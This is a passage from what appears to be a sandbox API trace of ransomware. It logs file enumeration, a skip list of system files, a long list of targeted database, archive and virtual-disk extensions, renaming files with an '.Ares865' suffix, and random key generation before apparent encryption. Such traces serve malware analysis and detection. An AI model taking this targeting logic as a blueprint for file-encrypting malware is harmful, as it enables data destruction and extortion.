[0089.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.222] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="aoldtz.exe") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2=".") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="..") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="windows") returned -1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="bootmgr") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="temp") returned -1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="pagefile.sys") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="boot") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="ids.txt") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="ntuser.dat") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="perflogs") returned 1 [0089.222] lstrcmpiW (lpString1="print_property.ico", lpString2="MSBuild") returned 1 [0089.222] lstrlenW (lpString="print_property.ico") returned 18 [0089.222] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 100 [0089.222] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="print_property.ico" | out: lpString1="print_property.ico") returned="print_property.ico" [0089.222] lstrlenW (lpString="print_property.ico") returned 18 [0089.223] lstrlenW (lpString="Ares865") returned 7 [0089.223] lstrcmpiW (lpString1="rty.ico", lpString2="Ares865") returned 1 [0089.223] lstrlenW (lpString=".dll") returned 4 [0089.223] lstrcmpiW (lpString1="print_property.ico", lpString2=".dll") returned 1 [0089.223] lstrlenW (lpString=".lnk") returned 4 [0089.223] lstrcmpiW (lpString1="print_property.ico", lpString2=".lnk") returned 1 [0089.223] lstrlenW (lpString=".ini") returned 4 [0089.223] lstrcmpiW (lpString1="print_property.ico", lpString2=".ini") returned 1 [0089.223] lstrlenW (lpString=".sys") returned 4 [0089.223] lstrcmpiW (lpString1="print_property.ico", lpString2=".sys") returned 1 [0089.223] lstrlenW (lpString="print_property.ico") returned 18 [0089.223] lstrlenW (lpString="bak") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.223] lstrlenW (lpString="ba_") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.223] lstrlenW (lpString="dbb") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.223] lstrlenW (lpString="vmdk") returned 4 [0089.223] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.223] lstrlenW (lpString="rar") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.223] lstrlenW (lpString="zip") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.223] lstrlenW (lpString="tgz") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.223] lstrlenW (lpString="vbox") returned 4 [0089.223] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.223] lstrlenW (lpString="vdi") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.223] lstrlenW (lpString="vhd") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.223] lstrlenW (lpString="vhdx") returned 4 [0089.223] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.223] lstrlenW (lpString="avhd") returned 4 [0089.223] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.223] lstrlenW (lpString="db") returned 2 [0089.223] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.223] lstrlenW (lpString="db2") returned 3 [0089.223] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.224] lstrlenW (lpString="db3") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.224] lstrlenW (lpString="dbf") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.224] lstrlenW (lpString="mdf") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.224] lstrlenW (lpString="mdb") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.224] lstrlenW (lpString="sql") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.224] lstrlenW (lpString="sqlite") returned 6 [0089.224] lstrcmpiW (lpString1="ty.ico", lpString2="sqlite") returned 1 [0089.224] lstrlenW (lpString="sqlite3") returned 7 [0089.224] lstrcmpiW (lpString1="rty.ico", lpString2="sqlite3") returned -1 [0089.224] lstrlenW (lpString="sqlitedb") returned 8 [0089.224] lstrcmpiW (lpString1="erty.ico", lpString2="sqlitedb") returned -1 [0089.224] lstrlenW (lpString="xml") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.224] lstrlenW (lpString="$er") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.224] lstrlenW (lpString="4dd") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.224] lstrlenW (lpString="4dl") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.224] lstrlenW (lpString="^^^") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.224] lstrlenW (lpString="abs") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.224] lstrlenW (lpString="abx") returned 3 [0089.224] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.224] lstrlenW (lpString="accdb") returned 5 [0089.224] lstrcmpiW (lpString1="y.ico", lpString2="accdb") returned 1 [0089.224] lstrlenW (lpString="accdc") returned 5 [0089.224] lstrcmpiW (lpString1="y.ico", lpString2="accdc") returned 1 [0089.224] lstrlenW (lpString="accde") returned 5 [0089.224] lstrcmpiW (lpString1="y.ico", lpString2="accde") returned 1 [0089.224] lstrlenW (lpString="accdr") returned 5 [0089.224] lstrcmpiW (lpString1="y.ico", lpString2="accdr") returned 1 [0089.224] lstrlenW (lpString="accdt") returned 5 [0089.224] lstrcmpiW (lpString1="y.ico", lpString2="accdt") returned 1 [0089.225] lstrlenW (lpString="accdw") returned 5 [0089.225] lstrcmpiW (lpString1="y.ico", lpString2="accdw") returned 1 [0089.225] lstrlenW (lpString="accft") returned 5 [0089.225] lstrcmpiW (lpString1="y.ico", lpString2="accft") returned 1 [0089.225] lstrlenW (lpString="adb") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.225] lstrlenW (lpString="adb") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.225] lstrlenW (lpString="ade") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.225] lstrlenW (lpString="adf") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.225] lstrlenW (lpString="adn") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.225] lstrlenW (lpString="adp") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.225] lstrlenW (lpString="alf") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.225] lstrlenW (lpString="ask") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.225] lstrlenW (lpString="btr") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.225] lstrlenW (lpString="cat") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.225] lstrlenW (lpString="cdb") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.225] lstrlenW (lpString="ckp") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.225] lstrlenW (lpString="cma") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.225] lstrlenW (lpString="cpd") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.225] lstrlenW (lpString="dacpac") returned 6 [0089.225] lstrcmpiW (lpString1="ty.ico", lpString2="dacpac") returned 1 [0089.225] lstrlenW (lpString="dad") returned 3 [0089.225] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.225] lstrlenW (lpString="dadiagrams") returned 10 [0089.225] lstrcmpiW (lpString1="operty.ico", lpString2="dadiagrams") returned 1 [0089.226] lstrlenW (lpString="daschema") returned 8 [0089.226] lstrcmpiW (lpString1="erty.ico", lpString2="daschema") returned 1 [0089.226] lstrlenW (lpString="db-journal") returned 10 [0089.226] lstrcmpiW (lpString1="operty.ico", lpString2="db-journal") returned 1 [0089.226] lstrlenW (lpString="db-shm") returned 6 [0089.226] lstrcmpiW (lpString1="ty.ico", lpString2="db-shm") returned 1 [0089.226] lstrlenW (lpString="db-wal") returned 6 [0089.226] lstrcmpiW (lpString1="ty.ico", lpString2="db-wal") returned 1 [0089.226] lstrlenW (lpString="dbc") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.226] lstrlenW (lpString="dbs") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.226] lstrlenW (lpString="dbt") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.226] lstrlenW (lpString="dbv") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.226] lstrlenW (lpString="dbx") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.226] lstrlenW (lpString="dcb") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.226] lstrlenW (lpString="dct") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.226] lstrlenW (lpString="dcx") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.226] lstrlenW (lpString="ddl") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.226] lstrlenW (lpString="dlis") returned 4 [0089.226] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.226] lstrlenW (lpString="dp1") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.226] lstrlenW (lpString="dqy") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.226] lstrlenW (lpString="dsk") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.226] lstrlenW (lpString="dsn") returned 3 [0089.226] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.226] lstrlenW (lpString="dtsx") returned 4 [0089.227] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.227] lstrlenW (lpString="dxl") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.227] lstrlenW (lpString="eco") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.227] lstrlenW (lpString="ecx") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.227] lstrlenW (lpString="edb") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.227] lstrlenW (lpString="epim") returned 4 [0089.227] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.227] lstrlenW (lpString="fcd") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.227] lstrlenW (lpString="fdb") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.227] lstrlenW (lpString="fic") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.227] lstrlenW (lpString="flexolibrary") returned 12 [0089.227] lstrcmpiW (lpString1="property.ico", lpString2="flexolibrary") returned 1 [0089.227] lstrlenW (lpString="fm5") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.227] lstrlenW (lpString="fmp") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.227] lstrlenW (lpString="fmp12") returned 5 [0089.227] lstrcmpiW (lpString1="y.ico", lpString2="fmp12") returned 1 [0089.227] lstrlenW (lpString="fmpsl") returned 5 [0089.227] lstrcmpiW (lpString1="y.ico", lpString2="fmpsl") returned 1 [0089.227] lstrlenW (lpString="fol") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.227] lstrlenW (lpString="fp3") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.227] lstrlenW (lpString="fp4") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.227] lstrlenW (lpString="fp5") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.227] lstrlenW (lpString="fp7") returned 3 [0089.227] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.227] lstrlenW (lpString="fpt") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.228] lstrlenW (lpString="frm") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.228] lstrlenW (lpString="gdb") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.228] lstrlenW (lpString="gdb") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.228] lstrlenW (lpString="grdb") returned 4 [0089.228] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.228] lstrlenW (lpString="gwi") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.228] lstrlenW (lpString="hdb") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.228] lstrlenW (lpString="his") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.228] lstrlenW (lpString="ib") returned 2 [0089.228] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.228] lstrlenW (lpString="idb") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.228] lstrlenW (lpString="ihx") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.228] lstrlenW (lpString="itdb") returned 4 [0089.228] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.228] lstrlenW (lpString="itw") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.228] lstrlenW (lpString="jet") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.228] lstrlenW (lpString="jtx") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.228] lstrlenW (lpString="kdb") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.228] lstrlenW (lpString="kexi") returned 4 [0089.228] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.228] lstrlenW (lpString="kexic") returned 5 [0089.228] lstrcmpiW (lpString1="y.ico", lpString2="kexic") returned 1 [0089.228] lstrlenW (lpString="kexis") returned 5 [0089.228] lstrcmpiW (lpString1="y.ico", lpString2="kexis") returned 1 [0089.228] lstrlenW (lpString="lgc") returned 3 [0089.228] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.228] lstrlenW (lpString="lwx") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.229] lstrlenW (lpString="maf") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.229] lstrlenW (lpString="maq") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.229] lstrlenW (lpString="mar") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.229] lstrlenW (lpString="marshal") returned 7 [0089.229] lstrcmpiW (lpString1="rty.ico", lpString2="marshal") returned 1 [0089.229] lstrlenW (lpString="mas") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.229] lstrlenW (lpString="mav") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.229] lstrlenW (lpString="maw") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.229] lstrlenW (lpString="mdbhtml") returned 7 [0089.229] lstrcmpiW (lpString1="rty.ico", lpString2="mdbhtml") returned 1 [0089.229] lstrlenW (lpString="mdn") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.229] lstrlenW (lpString="mdt") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.229] lstrlenW (lpString="mfd") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.229] lstrlenW (lpString="mpd") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.229] lstrlenW (lpString="mrg") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.229] lstrlenW (lpString="mud") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.229] lstrlenW (lpString="mwb") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.229] lstrlenW (lpString="myd") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.229] lstrlenW (lpString="ndf") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.229] lstrlenW (lpString="nnt") returned 3 [0089.229] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.229] lstrlenW (lpString="nrmlib") returned 6 [0089.229] lstrcmpiW (lpString1="ty.ico", lpString2="nrmlib") returned 1 [0089.230] lstrlenW (lpString="ns2") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.230] lstrlenW (lpString="ns3") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.230] lstrlenW (lpString="ns4") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.230] lstrlenW (lpString="nsf") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.230] lstrlenW (lpString="nv") returned 2 [0089.230] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.230] lstrlenW (lpString="nv2") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.230] lstrlenW (lpString="nwdb") returned 4 [0089.230] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.230] lstrlenW (lpString="nyf") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.230] lstrlenW (lpString="odb") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.230] lstrlenW (lpString="odb") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.230] lstrlenW (lpString="oqy") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.230] lstrlenW (lpString="ora") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.230] lstrlenW (lpString="orx") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.230] lstrlenW (lpString="owc") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.230] lstrlenW (lpString="p96") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.230] lstrlenW (lpString="p97") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.230] lstrlenW (lpString="pan") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.230] lstrlenW (lpString="pdb") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.230] lstrlenW (lpString="pdm") returned 3 [0089.230] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.230] lstrlenW (lpString="pnz") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.231] lstrlenW (lpString="qry") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.231] lstrlenW (lpString="qvd") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.231] lstrlenW (lpString="rbf") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.231] lstrlenW (lpString="rctd") returned 4 [0089.231] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.231] lstrlenW (lpString="rod") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.231] lstrlenW (lpString="rodx") returned 4 [0089.231] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.231] lstrlenW (lpString="rpd") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.231] lstrlenW (lpString="rsd") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.231] lstrlenW (lpString="sas7bdat") returned 8 [0089.231] lstrcmpiW (lpString1="erty.ico", lpString2="sas7bdat") returned -1 [0089.231] lstrlenW (lpString="sbf") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.231] lstrlenW (lpString="scx") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.231] lstrlenW (lpString="sdb") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.231] lstrlenW (lpString="sdc") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.231] lstrlenW (lpString="sdf") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.231] lstrlenW (lpString="sis") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.231] lstrlenW (lpString="spq") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.231] lstrlenW (lpString="te") returned 2 [0089.231] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.231] lstrlenW (lpString="teacher") returned 7 [0089.231] lstrcmpiW (lpString1="rty.ico", lpString2="teacher") returned -1 [0089.231] lstrlenW (lpString="tmd") returned 3 [0089.231] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.231] lstrlenW (lpString="tps") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.232] lstrlenW (lpString="trc") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.232] lstrlenW (lpString="trc") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.232] lstrlenW (lpString="trm") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.232] lstrlenW (lpString="udb") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.232] lstrlenW (lpString="udl") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.232] lstrlenW (lpString="usr") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.232] lstrlenW (lpString="v12") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.232] lstrlenW (lpString="vis") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.232] lstrlenW (lpString="vpd") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.232] lstrlenW (lpString="vvv") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.232] lstrlenW (lpString="wdb") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.232] lstrlenW (lpString="wmdb") returned 4 [0089.232] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.232] lstrlenW (lpString="wrk") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.232] lstrlenW (lpString="xdb") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.232] lstrlenW (lpString="xld") returned 3 [0089.232] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.232] lstrlenW (lpString="xmlff") returned 5 [0089.232] lstrcmpiW (lpString1="y.ico", lpString2="xmlff") returned 1 [0089.232] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.Ares865") returned 112 [0089.232] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.ares865"), dwFlags=0x1) returned 1 [0089.233] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.234] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=60344) returned 1 [0089.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.234] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.234] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.235] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xeec0, lpName=0x0) returned 0x15c [0089.236] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeec0) returned 0x190000 [0089.239] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.240] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.240] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.240] HeapFree (in: hHeap=0x2b0000, 